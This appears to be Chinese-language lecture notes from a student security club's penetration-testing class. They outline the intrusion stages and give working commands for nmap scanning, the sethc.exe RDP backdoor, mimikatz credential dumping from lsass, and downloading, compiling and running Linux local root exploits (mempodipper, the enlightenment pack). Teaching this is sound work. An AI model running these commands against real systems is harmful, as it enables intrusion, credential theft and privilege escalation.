NISRA_滲透測試 by Orange

滲透測試目的:
以駭客、攻擊者的眼光、手法,對系統進行安全測試
避免公司受他人攻擊而損失公司相關權益及機密

今日內容,基礎與概念為主。



認證過的道德駭客(白人)
標準很高如:AllenOwn


入侵流程 
1.Reconnaissance (Foot Printing)
找尋弱點

2.Scanning(掃描弱點)

3.Gaining Access(
利用弱點浸入)

4.Maintaining Access

5.Clearing Tracks(清除足跡)

雖然有這樣的入侵流程
也有迂迴性的滲透

一、 Reconnaissance
用盡一切方法拐到資訊
1.Google (
人肉 GoogleHacking)
2.Who.is
3.DNS Zone transfer

目標是? 有沒有防火牆? IDS ...等等
總而言之
資訊越多,入侵機會越多
服務越多,入侵機會越多

入侵 HTML網站,單就HTML資訊不容易找到弱點,因為資訊太少

About who.is
   http://whois.sc/
   http://whois365.com

二、Scanning
1.觀察、分析、思考
觀察有哪些服務提供,分析每個服務的來由,思考可能有甚麼弱點

2.Scanning Port
Port =
範圍從1~65535
FTP
22
HTTP
80
檢查Port有沒有開
Tool
NetCat (超好用) 之前有過教學

Tool
NMAP Usage (資安必備)
安裝:http://nmap.org/dist/nmap-5.51-setup.exe
   nmap -sT 127.0.0.1      # 起手式
   nmap -sT 127.0.0.1-254  # IP range  
   nmap -sT -p 80 127.0.0.1    # 指定端口
   nmap -sT -p 1-9 127.0.0.1   # Port range 掃所有服務
   nmap -sT -v 127.0.0.1   # 詳細模式
   nmap -A 127.0.0.1       # 檢測作業系統

3.
弱點掃描
RDP後門 (port 3889)
-sethc.exe
連上遠端桌面第一件事不是打帳號,是快速按下五次shift

4.
猜密碼─空密碼 , 123456 , 帳號

三、Gaining Access
1.
關鍵點,請善用所有上一步取得的資訊
2. 存取權限分為Read Write eXecute
3.
失敗請退回上一步
漏洞網站
http://exploit-db.com
http://www.metasploit.com/
   如果 metasploit 覺得很複雜可以試試 Artimage 提供一個更簡單一點介面操作 metasploit


找到弱點後
msfjui
可以自動幫你從漏洞攻擊


   Artimage 要用的話要裝 jre ^______<
   http://www.fastandeasyhacking.com/download  # Artimage 下載點


http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip

四、放後門
# Mimikazt 下載點
http://orangee.tw/w/mimikatz_trunk.zip
下載後請開啟 cmd 後進入資料夾,看你是 32 位元還是 64 位元
( UAC 請記得以系統管理員權限執行 cmd.exe)
之後執行 mimikatz.exe 進入到它的介面
之後依序輸入
   privilege::debug
   inject::process lsass.exe sekurlsa.dll
   @getLogonPasswords


之後會跳出一堆東西,wdigest 那裏應該就是密碼。
   http://www.webshell.cc/wp-content/uploads/image/2012/02/052115cYL.jpg #





Linux 的人可以試試 Linux  本地提權
Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
可以用
   ~$ uname -a    #查看自己的 Linux 版本
輸入以下指令
   ~$ wget http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c
   ~$ gcc mempodipper.c -o mempodipper
   ~$ chmod +x mempodipper
   ~$  ./mempodier
假如你的主機存在漏洞的話應該會跳出一個 root shell 讓你從普通使用者變身 root


Linux 提權懶人包
   http://grsecurity.net/~spender/exploits/enlightenment.tgz   # 下載點
   http://orangee.tw/w/enlightenment.tgz

   ~$ wget http://grsecurity.net/~spender/exploits/enlightenment.tgz
   ~$ tar -zxvf enlightenment.tgz
   ~$ cd enlightenment
   ~$ ./run_nonnull_exploits.sh 或者 ./run_null_exploits.sh
   差別在於有些機器有上防護 patch 使得 null point 的攻擊不可成功。


安全的本質是甚麼?
   http://hi.baidu.com/yuange1975/blog/item/08c3dddacc5c0cccb6fd48d2.html  #文章地址
五、清犯罪足跡 (秘密)Orange@nisra.net

留言